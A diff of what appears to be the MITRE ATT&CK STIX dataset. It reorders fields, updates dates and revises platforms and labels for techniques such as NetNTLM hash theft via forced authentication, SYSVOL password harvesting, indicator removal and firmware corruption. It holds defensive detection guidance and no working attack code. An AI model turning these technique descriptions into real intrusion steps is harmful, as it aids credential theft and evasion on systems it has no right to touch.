- "modified": "2020-03-23T19:37:54.071Z",
+ "modified": "2020-06-19T20:07:09.600Z",
"created": "2017-05-31T21:31:44.421Z",
- "x_mitre_version": "2.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.",
+ "x_mitre_data_sources": [
+ "Authentication logs"
+ ],
"x_mitre_contributors": [
"Daniel Oakley",
"Travis Smith, Tripwire"
],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
"id": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0",
@@ -10643,28 +11052,27 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:38:26.296Z",
+ "modified": "2020-06-20T22:26:33.191Z",
"created": "2020-01-14T17:18:32.126Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)",
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
- "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Fallback Channels",
- "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10677,9 +11085,10 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
+ "name": "Fallback Channels",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -10687,8 +11096,9 @@
"phase_name": "command-and-control"
}
],
- "modified": "2019-07-17T21:17:03.445Z",
+ "modified": "2020-07-14T19:49:47.340Z",
"created": "2017-05-31T21:30:21.689Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Malware reverse engineering",
@@ -10744,17 +11154,17 @@
],
"modified": "2020-03-27T16:10:37.183Z",
"created": "2020-03-11T14:11:16.560Z",
+ "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_data_sources": [
+ "DNS records"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_data_sources": [
- "DNS records"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection."
+ ]
},
{
"id": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59",
@@ -10780,8 +11190,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.004",
- "url": "https://attack.mitre.org/techniques/T1551/004"
+ "external_id": "T1070.004",
+ "url": "https://attack.mitre.org/techniques/T1070/004"
},
{
"url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
@@ -10805,27 +11215,27 @@
],
"modified": "2020-03-29T21:34:16.209Z",
"created": "2020-01-31T12:35:36.479Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_contributors": [
+ "Walker Johnson"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis"
+ ],
+ "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
"x_mitre_data_sources": [
"Binary file metadata",
"Process command-line parameters",
"File monitoring"
],
- "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Walker Johnson"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -10887,11 +11297,9 @@
],
"modified": "2020-03-26T20:26:46.465Z",
"created": "2020-03-15T16:16:25.763Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Network protocol analysis",
"Process monitoring",
@@ -10899,14 +11307,26 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:04.710Z",
+ "modified": "2020-03-26T17:18:36.857Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "File and Directory Discovery",
+ "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -10919,19 +11339,9 @@
"source_name": "Windows Commands JPCERT"
}
],
- "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
- "name": "File and Directory Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T17:18:36.857Z",
- "created": "2017-05-31T21:31:04.710Z",
"x_mitre_system_requirements": [
"Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls"
],
@@ -10955,9 +11365,19 @@
"x_mitre_is_subtechnique": false
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-03-29T23:12:40.212Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "File and Directory Permissions Modification",
+ "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -10980,19 +11400,9 @@
"source_name": "EventTracker File Permissions Feb 2014"
}
],
- "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
- "name": "File and Directory Permissions Modification",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-29T23:12:40.212Z",
- "created": "2018-10-17T00:14:20.652Z",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
@@ -11022,6 +11432,13 @@
"x_mitre_version": "2.1"
},
{
+ "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89",
+ "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.",
+ "name": "Firmware Corruption",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "T1495",
@@ -11039,13 +11456,6 @@
"source_name": "MITRE Trustworthy Firmware Measurement"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Firmware Corruption",
- "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.",
- "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -11053,8 +11463,9 @@
"phase_name": "impact"
}
],
- "modified": "2019-07-17T21:23:45.464Z",
+ "modified": "2020-07-14T19:31:46.550Z",
"created": "2019-04-12T18:28:15.451Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -11113,7 +11524,7 @@
},
{
"url": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/",
- "description": "Malith, O. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.",
+ "description": "Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.",
"source_name": "Osanda Stealing NetNTLM Hashes"
},
{
@@ -11132,27 +11543,27 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-25T20:32:05.842Z",
+ "modified": "2020-06-19T17:16:41.470Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Teodor Cimpoesu",
- "Sudhanshu Chauhan, @Sudhanshu_C"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)",
"x_mitre_data_sources": [
"File monitoring",
"Network protocol analysis",
"Network device logs",
"Process use of network"
],
- "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Teodor Cimpoesu",
+ "Sudhanshu Chauhan, @Sudhanshu_C"
],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -11207,15 +11618,8 @@
],
"modified": "2020-03-24T20:56:14.853Z",
"created": "2020-02-11T18:58:45.908Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.\n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Matthew Molyett, @s1air, Cisco Talos"
],
"x_mitre_data_sources": [
"PowerShell logs",
@@ -11223,8 +11627,15 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Matthew Molyett, @s1air, Cisco Talos"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.\n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
]
},
{
@@ -11304,26 +11715,26 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-02-05T16:16:08.471Z",
+ "modified": "2020-06-20T22:41:20.063Z",
"created": "2020-02-05T16:16:08.471Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Anti-virus"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_detection": "Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -11379,18 +11790,18 @@
],
"modified": "2020-03-31T12:59:10.840Z",
"created": "2020-02-11T19:13:33.643Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -11422,27 +11833,27 @@
],
"modified": "2020-03-30T13:38:08.738Z",
"created": "2017-05-31T21:30:50.342Z",
- "x_mitre_remote_support": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. \n\nUnknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"Binary file metadata"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. \n\nUnknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_remote_support": true
},
{
"external_references": [
@@ -11507,27 +11918,27 @@
],
"modified": "2020-03-26T21:17:41.231Z",
"created": "2019-03-07T14:10:32.650Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_defense_bypassed": [
+ "System access controls",
+ "File system access controls"
+ ],
+ "x_mitre_detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). ",
+ "x_mitre_version": "1.1",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_data_sources": [
+ "Windows event logs"
],
"x_mitre_contributors": [
"Itamar Mizrahi, Cymptom",
"Tristan Bennett, Seamless Intelligence"
],
- "x_mitre_data_sources": [
- "Windows event logs"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). ",
- "x_mitre_defense_bypassed": [
- "System access controls",
- "File system access controls"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -11571,21 +11982,21 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-31T12:53:56.361Z",
+ "modified": "2020-06-17T14:25:38.082Z",
"created": "2020-02-11T18:43:06.253Z",
- "x_mitre_detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Windows event logs"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Windows event logs"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)"
},
{
"id": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953",
@@ -11636,26 +12047,26 @@
],
"modified": "2020-03-29T22:09:18.020Z",
"created": "2020-02-21T20:56:06.498Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis",
+ "Log analysis"
+ ],
+ "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.",
"x_mitre_data_sources": [
"Environment variable",
"File monitoring",
"Authentication logs",
"Process monitoring"
],
- "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis",
- "Log analysis"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9",
@@ -11704,18 +12115,80 @@
"phase_name": "initial-access"
}
],
- "modified": "2019-07-17T21:35:06.932Z",
+ "modified": "2020-07-14T19:36:40.493Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Asset management",
- "Data loss prevention"
- ],
- "x_mitre_detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
+ ],
+ "x_mitre_detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.",
+ "x_mitre_data_sources": [
+ "Asset management",
+ "Data loss prevention"
+ ],
+ "x_mitre_version": "1.0"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1564.005",
+ "url": "https://attack.mitre.org/techniques/T1564/005"
+ },
+ {
+ "source_name": "MalwareTech VFS Nov 2014",
+ "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html",
+ "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
